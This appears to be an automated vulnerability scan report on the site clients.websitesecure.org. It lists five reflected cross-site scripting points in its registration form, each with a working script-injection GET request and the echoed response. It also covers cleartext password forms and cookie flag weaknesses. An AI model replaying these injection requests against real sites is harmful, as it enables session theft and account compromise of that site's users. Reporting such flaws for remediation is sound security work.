Report generated by XSS.Cx at Wed Aug 08 11:13:13 EDT 2012.

XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, clients.websitesecure.org

Loading

1. Cross-site scripting (reflected)

1.1. http://clients.websitesecure.org/ [new_display parameter]

1.2. http://clients.websitesecure.org/ [new_email parameter]

1.3. http://clients.websitesecure.org/ [new_icq parameter]

1.4. http://clients.websitesecure.org/ [new_user parameter]

1.5. http://clients.websitesecure.org/ [user_refer_text parameter]

2. Cleartext submission of password

3. Password field submitted using GET method

4. Cookie without HttpOnly flag set

5. Password field with autocomplete enabled

5.1. http://clients.websitesecure.org/

5.2. http://clients.websitesecure.org/

6. HTML does not specify charset



1. Cross-site scripting (reflected)  next
There are 5 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organization in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://clients.websitesecure.org/ [new_display parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clients.websitesecure.org
Path:   /

Issue detail

The value of the new_display request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e921"><script>alert(1)</script>6b5b5ccb9f8dcbc50 was submitted in the new_display parameter. This input was echoed as 4e921\"><script>alert(1)</script>6b5b5ccb9f8dcbc50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /?new_user=&new_display=4e921"><script>alert(1)</script>6b5b5ccb9f8dcbc50&new_password=&new_passwordR=&new_email=&new_icq=&user_refer_text=&new_submit=Register HTTP/1.1
Host: clients.websitesecure.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://clients.websitesecure.org/
Cookie: __utma=56650156.1358186545.1323158667.1323158667.1323158667.1; __utmb=56650156.7.10.1323158667; __utmc=56650156; __utmz=56650156.1323158667.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; PHPSESSID=0cd60b0f84d2c281a8fc367682119aff

Response

HTTP/1.1 200 OK
Date: Tue, 06 Dec 2011 08:07:17 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g prxp_module/1.11.20
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9378
Content-Type: text/html

<html>
<head>
   <title>WebsiteSecure.org Clients</title>
   <link rel="stylesheet" type="text/css" href="/style.css" />
   <script>
   <!--
   function showDiv(divName)
   {
       document.getElementById('in
...[SNIP]...
<input type="text" name="new_display" value="4e921\"><script>alert(1)</script>6b5b5ccb9f8dcbc50" onfocus="showDiv('inf_Program');">
...[SNIP]...

1.2. http://clients.websitesecure.org/ [new_email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clients.websitesecure.org
Path:   /

Issue detail

The value of the new_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd3d"><script>alert(1)</script>6b35b87c6883e12a9 was submitted in the new_email parameter. This input was echoed as 9fd3d\"><script>alert(1)</script>6b35b87c6883e12a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /?new_user=&new_display=&new_password=&new_passwordR=&new_email=9fd3d"><script>alert(1)</script>6b35b87c6883e12a9&new_icq=&user_refer_text=&new_submit=Register HTTP/1.1
Host: clients.websitesecure.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://clients.websitesecure.org/
Cookie: __utma=56650156.1358186545.1323158667.1323158667.1323158667.1; __utmb=56650156.7.10.1323158667; __utmc=56650156; __utmz=56650156.1323158667.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; PHPSESSID=0cd60b0f84d2c281a8fc367682119aff

Response

HTTP/1.1 200 OK
Date: Tue, 06 Dec 2011 08:07:21 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g prxp_module/1.11.20
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9357
Content-Type: text/html

<html>
<head>
   <title>WebsiteSecure.org Clients</title>
   <link rel="stylesheet" type="text/css" href="/style.css" />
   <script>
   <!--
   function showDiv(divName)
   {
       document.getElementById('in
...[SNIP]...
<input type="text" name="new_email" value="9fd3d\"><script>alert(1)</script>6b35b87c6883e12a9" onfocus="showDiv('inf_Email');">
...[SNIP]...

1.3. http://clients.websitesecure.org/ [new_icq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clients.websitesecure.org
Path:   /

Issue detail

The value of the new_icq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf47"><script>alert(1)</script>1659fd3f313619164 was submitted in the new_icq parameter. This input was echoed as 9cf47\"><script>alert(1)</script>1659fd3f313619164 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /?new_user=&new_display=&new_password=&new_passwordR=&new_email=&new_icq=9cf47"><script>alert(1)</script>1659fd3f313619164&user_refer_text=&new_submit=Register HTTP/1.1
Host: clients.websitesecure.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://clients.websitesecure.org/
Cookie: __utma=56650156.1358186545.1323158667.1323158667.1323158667.1; __utmb=56650156.7.10.1323158667; __utmc=56650156; __utmz=56650156.1323158667.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; PHPSESSID=0cd60b0f84d2c281a8fc367682119aff

Response

HTTP/1.1 200 OK
Date: Tue, 06 Dec 2011 08:07:25 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g prxp_module/1.11.20
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9378
Content-Type: text/html

<html>
<head>
   <title>WebsiteSecure.org Clients</title>
   <link rel="stylesheet" type="text/css" href="/style.css" />
   <script>
   <!--
   function showDiv(divName)
   {
       document.getElementById('in
...[SNIP]...
<input type="text" name="new_icq" value="9cf47\"><script>alert(1)</script>1659fd3f313619164" onfocus="showDiv('inf_icq');">
...[SNIP]...

1.4. http://clients.websitesecure.org/ [new_user parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clients.websitesecure.org
Path:   /

Issue detail

The value of the new_user request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58910"><script>alert(1)</script>e1db7cdf8dbc292eb was submitted in the new_user parameter. This input was echoed as 58910\"><script>alert(1)</script>e1db7cdf8dbc292eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /?new_user=58910"><script>alert(1)</script>e1db7cdf8dbc292eb&new_display=&new_password=&new_passwordR=&new_email=&new_icq=&user_refer_text=&new_submit=Register HTTP/1.1
Host: clients.websitesecure.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://clients.websitesecure.org/
Cookie: __utma=56650156.1358186545.1323158667.1323158667.1323158667.1; __utmb=56650156.7.10.1323158667; __utmc=56650156; __utmz=56650156.1323158667.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; PHPSESSID=0cd60b0f84d2c281a8fc367682119aff

Response

HTTP/1.1 200 OK
Date: Tue, 06 Dec 2011 08:07:14 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g prxp_module/1.11.20
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9307
Content-Type: text/html

<html>
<head>
   <title>WebsiteSecure.org Clients</title>
   <link rel="stylesheet" type="text/css" href="/style.css" />
   <script>
   <!--
   function showDiv(divName)
   {
       document.getElementById('in
...[SNIP]...
<input type="text" name="new_user" value="58910\"><script>alert(1)</script>e1db7cdf8dbc292eb" onfocus="showDiv('inf_userName');">
...[SNIP]...

1.5. http://clients.websitesecure.org/ [user_refer_text parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clients.websitesecure.org
Path:   /

Issue detail

The value of the user_refer_text request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bb43"><script>alert(1)</script>702f4c1a62041145a was submitted in the user_refer_text parameter. This input was echoed as 8bb43\\\"><script>alert(1)</script>702f4c1a62041145a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /?new_user=&new_display=&new_password=&new_passwordR=&new_email=&new_icq=&user_refer_text=8bb43"><script>alert(1)</script>702f4c1a62041145a&new_submit=Register HTTP/1.1
Host: clients.websitesecure.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://clients.websitesecure.org/
Cookie: __utma=56650156.1358186545.1323158667.1323158667.1323158667.1; __utmb=56650156.7.10.1323158667; __utmc=56650156; __utmz=56650156.1323158667.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; PHPSESSID=0cd60b0f84d2c281a8fc367682119aff

Response

HTTP/1.1 200 OK
Date: Tue, 06 Dec 2011 08:07:29 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g prxp_module/1.11.20
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9380
Content-Type: text/html

<html>
<head>
   <title>WebsiteSecure.org Clients</title>
   <link rel="stylesheet" type="text/css" href="/style.css" />
   <script>
   <!--
   function showDiv(divName)
   {
       document.getElementById('in
...[SNIP]...
<input type="text" name="user_refer_text" value="8bb43\\\"><script>alert(1)</script>702f4c1a62041145a" onfocus="showDiv('inf_Refer');">
...[SNIP]...

2. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clients.websitesecure.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET / HTTP/1.1
Host: clients.websitesecure.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.websitesecure.org/?bb175%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef76e574b8d4=1
Cookie: __utma=56650156.1358186545.1323158667.1323158667.1323158667.1; __utmb=56650156.1.10.1323158667; __utmc=56650156; __utmz=56650156.1323158667.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 06 Dec 2011 08:04:31 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g prxp_module/1.11.20
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=5505c60d42cbb306a1f575f70983439c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9139
Content-Type: text/html

<html>
<head>
   <title>WebsiteSecure.org Clients</title>
   <link rel="stylesheet" type="text/css" href="/style.css" />
   <script>
   <!--
   function showDiv(divName)
   {
       document.getElementById('in
...[SNIP]...
<br>
       <form action="" method="POST">
       <table cellpadding="0" cellspacing="0" align="center" width="600">
...[SNIP]...
<td><input type="password" name="new_password" onfocus="showDiv('inf_Password');"></td>
...[SNIP]...
<td><input type="password" name="new_passwordR" onfocus="showDiv('inf_RePassword');"></td>
...[SNIP]...

3. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://clients.websitesecure.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET / HTTP/1.1
Host: clients.websitesecure.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.websitesecure.org/?bb175%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef76e574b8d4=1
Cookie: __utma=56650156.1358186545.1323158667.1323158667.1323158667.1; __utmb=56650156.1.10.1323158667; __utmc=56650156; __utmz=56650156.1323158667.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 06 Dec 2011 08:04:31 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g prxp_module/1.11.20
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=5505c60d42cbb306a1f575f70983439c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9139
Content-Type: text/html

<html>
<head>
   <title>WebsiteSecure.org Clients</title>
   <link rel="stylesheet" type="text/css" href="/style.css" />
   <script>
   <!--
   function showDiv(divName)
   {
       document.getElementById('in
...[SNIP]...
<td width="50%" valign="top" align="left">
                       <form action="https://clients.websitesecure.org/login.php">
                       <table width="100%">
...[SNIP]...
<td><input type="password" name="password"></td>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://clients.websitesecure.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET / HTTP/1.1
Host: clients.websitesecure.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.websitesecure.org/?bb175%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef76e574b8d4=1
Cookie: __utma=56650156.1358186545.1323158667.1323158667.1323158667.1; __utmb=56650156.1.10.1323158667; __utmc=56650156; __utmz=56650156.1323158667.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 06 Dec 2011 08:04:31 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g prxp_module/1.11.20
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=5505c60d42cbb306a1f575f70983439c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9139
Content-Type: text/html

<html>
<head>
   <title>WebsiteSecure.org Clients</title>
   <link rel="stylesheet" type="text/css" href="/style.css" />
   <script>
   <!--
   function showDiv(divName)
   {
       document.getElementById('in
...[SNIP]...

5. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. http://clients.websitesecure.org/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://clients.websitesecure.org
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: clients.websitesecure.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.websitesecure.org/?bb175%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef76e574b8d4=1
Cookie: __utma=56650156.1358186545.1323158667.1323158667.1323158667.1; __utmb=56650156.1.10.1323158667; __utmc=56650156; __utmz=56650156.1323158667.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 06 Dec 2011 08:04:31 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g prxp_module/1.11.20
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=5505c60d42cbb306a1f575f70983439c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9139
Content-Type: text/html

<html>
<head>
   <title>WebsiteSecure.org Clients</title>
   <link rel="stylesheet" type="text/css" href="/style.css" />
   <script>
   <!--
   function showDiv(divName)
   {
       document.getElementById('in
...[SNIP]...
<br>
       <form action="" method="POST">
       <table cellpadding="0" cellspacing="0" align="center" width="600">
...[SNIP]...
<td><input type="password" name="new_password" onfocus="showDiv('inf_Password');"></td>
...[SNIP]...
<td><input type="password" name="new_passwordR" onfocus="showDiv('inf_RePassword');"></td>
...[SNIP]...

5.2. http://clients.websitesecure.org/  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://clients.websitesecure.org
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: clients.websitesecure.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.websitesecure.org/?bb175%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef76e574b8d4=1
Cookie: __utma=56650156.1358186545.1323158667.1323158667.1323158667.1; __utmb=56650156.1.10.1323158667; __utmc=56650156; __utmz=56650156.1323158667.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 06 Dec 2011 08:04:31 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g prxp_module/1.11.20
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=5505c60d42cbb306a1f575f70983439c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9139
Content-Type: text/html

<html>
<head>
   <title>WebsiteSecure.org Clients</title>
   <link rel="stylesheet" type="text/css" href="/style.css" />
   <script>
   <!--
   function showDiv(divName)
   {
       document.getElementById('in
...[SNIP]...
<td width="50%" valign="top" align="left">
                       <form action="https://clients.websitesecure.org/login.php">
                       <table width="100%">
...[SNIP]...
<td><input type="password" name="password"></td>
...[SNIP]...

6. HTML does not specify charset  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clients.websitesecure.org
Path:   /

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyze the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognized character set, for example charset=ISO-8859-1.

Request

GET / HTTP/1.1
Host: clients.websitesecure.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.websitesecure.org/?bb175%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef76e574b8d4=1
Cookie: __utma=56650156.1358186545.1323158667.1323158667.1323158667.1; __utmb=56650156.1.10.1323158667; __utmc=56650156; __utmz=56650156.1323158667.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 06 Dec 2011 08:04:31 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g prxp_module/1.11.20
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=5505c60d42cbb306a1f575f70983439c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9139
Content-Type: text/html

<html>
<head>
   <title>WebsiteSecure.org Clients</title>
   <link rel="stylesheet" type="text/css" href="/style.css" />
   <script>
   <!--
   function showDiv(divName)
   {
       document.getElementById('in
...[SNIP]...

Report generated by XSS.Cx at Wed Aug 08 11:13:13 EDT 2012.